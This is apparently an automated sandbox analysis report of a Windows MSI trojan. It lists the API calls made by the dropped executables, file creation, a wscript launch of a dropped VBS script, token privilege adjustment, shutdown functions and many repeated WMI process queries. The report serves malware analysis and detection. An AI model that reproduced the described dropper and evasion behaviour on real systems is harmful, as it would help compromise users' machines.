                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_002EF5D0

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,3_2_007729C2
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007E02AA NtdllDialogWndProc_W,3_2_007E02AA
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DE769 NtdllDialogWndProc_W,CallWindowProcW,3_2_007DE769
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DEA4E NtdllDialogWndProc_W,3_2_007DEA4E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,3_2_007DEAA6
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,3_2_007DECBC
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078AC99 NtdllDialogWndProc_W,3_2_0078AC99
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W,3_2_0078AD5C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078AFB4 GetParent,NtdllDialogWndProc_W,3_2_0078AFB4
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,3_2_007DEFA8
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF0A1 SendMessageW,NtdllDialogWndProc_W,3_2_007DF0A1
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,3_2_007DF122
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF37C NtdllDialogWndProc_W,3_2_007DF37C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF3DA NtdllDialogWndProc_W,3_2_007DF3DA
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF3AB NtdllDialogWndProc_W,3_2_007DF3AB
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF45A ClientToScreen,NtdllDialogWndProc_W,3_2_007DF45A
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF425 NtdllDialogWndProc_W,3_2_007DF425
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_007DF5D0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF594 GetWindowLongW,NtdllDialogWndProc_W,3_2_007DF594
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078B7F2 NtdllDialogWndProc_W,3_2_0078B7F2
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078B845 NtdllDialogWndProc_W,3_2_0078B845
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DFE80 NtdllDialogWndProc_W,3_2_007DFE80
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,3_2_007DFF04
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,3_2_007DFF91
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002829C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,8_2_002829C2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002F02AA NtdllDialogWndProc_W,8_2_002F02AA
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EE769 NtdllDialogWndProc_W,CallWindowProcW,8_2_002EE769
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EEA4E NtdllDialogWndProc_W,8_2_002EEA4E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,8_2_002EEAA6
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,8_2_002EECBC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029AC99 NtdllDialogWndProc_W,8_2_0029AC99
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W,8_2_0029AD5C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,8_2_002EEFA8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029AFB4 GetParent,NtdllDialogWndProc_W,8_2_0029AFB4
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF0A1 SendMessageW,NtdllDialogWndProc_W,8_2_002EF0A1
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,8_2_002EF122
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF37C NtdllDialogWndProc_W,8_2_002EF37C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF3AB NtdllDialogWndProc_W,8_2_002EF3AB
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF3DA NtdllDialogWndProc_W,8_2_002EF3DA
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF425 NtdllDialogWndProc_W,8_2_002EF425
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF45A ClientToScreen,NtdllDialogWndProc_W,8_2_002EF45A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF594 GetWindowLongW,NtdllDialogWndProc_W,8_2_002EF594
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_002EF5D0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029B7F2 NtdllDialogWndProc_W,8_2_0029B7F2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029B845 NtdllDialogWndProc_W,8_2_0029B845
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EFE80 NtdllDialogWndProc_W,8_2_002EFE80
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,8_2_002EFF04
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,8_2_002EFF91
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B702F: CreateFileW,DeviceIoControl,CloseHandle,3_2_007B702F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007AB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,3_2_007AB9F1
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_007B82D0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_002C82D0
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\687630.msiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7739.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77F6.tmpJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00782B403_2_00782B40
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007D30AD3_2_007D30AD
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007836803_2_00783680
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0077DCD03_2_0077DCD0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0077A0C03_2_0077A0C0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007901833_2_00790183
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B220C3_2_007B220C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007785303_2_00778530
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007766703_2_00776670
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007906773_2_00790677
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A87793_2_007A8779
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DA8DC3_2_007DA8DC
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00790A8F3_2_00790A8F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00776BBC3_2_00776BBC
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00778CA03_2_00778CA0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0079AC833_2_0079AC83
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078AD5C3_2_0078AD5C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00790EC43_2_00790EC4
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A4EBF3_2_007A4EBF
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A113E3_2_007A113E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007912F93_2_007912F9
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A542F3_2_007A542F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF5D03_2_007DF5D0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A599F3_2_007A599F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0079DA743_2_0079DA74
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00775D323_2_00775D32
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0077BDF03_2_0077BDF0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0079BDF63_2_0079BDF6
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00791E5A3_2_00791E5A
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0079DF693_2_0079DF69
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A7FFD3_2_007A7FFD
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BBFB83_2_007BBFB8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0028DCD08_2_0028DCD0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0028A0C08_2_0028A0C0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A01838_2_002A0183
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C220C8_2_002C220C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002885308_2_00288530
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002866708_2_00286670
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A06778_2_002A0677
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B87798_2_002B8779
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EA8DC8_2_002EA8DC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A0A8F8_2_002A0A8F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_00286BBC8_2_00286BBC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_00288CA08_2_00288CA0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002AAC838_2_002AAC83
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029AD5C8_2_0029AD5C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B4EBF8_2_002B4EBF
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A0EC48_2_002A0EC4
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002E30AD8_2_002E30AD
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B113E8_2_002B113E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A12F98_2_002A12F9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B542F8_2_002B542F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002EF5D08_2_002EF5D0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002936808_2_00293680
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B599F8_2_002B599F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002ADA748_2_002ADA74
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_00285D328_2_00285D32
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0028BDF08_2_0028BDF0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002ABDF68_2_002ABDF6
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A1E5A8_2_002A1E5A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_00289EC98_2_00289EC9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002ADF698_2_002ADF69
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CBFB88_2_002CBFB8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002B7FFD8_2_002B7FFD
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: String function: 0029F885 appears 68 times
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: String function: 002A7750 appears 42 times
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: String function: 00797750 appears 42 times
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: String function: 0078F885 appears 68 times
                Source: classification engineClassification label: mal100.troj.evad.winMSI@17/14@0/1
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BD712 GetLastError,FormatMessageW,3_2_007BD712
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007AB8B0 AdjustTokenPrivileges,CloseHandle,3_2_007AB8B0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_007ABEC3
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002BB8B0 AdjustTokenPrivileges,CloseHandle,8_2_002BB8B0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_002BBEC3
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_007BEA85
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,3_2_007B6F5B
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BEFCD CoInitialize,CoCreateInstance,CoUninitialize,3_2_007BEFCD
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_007731F2
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML77E5.tmpJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF80922B01F2801C61.TMPJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
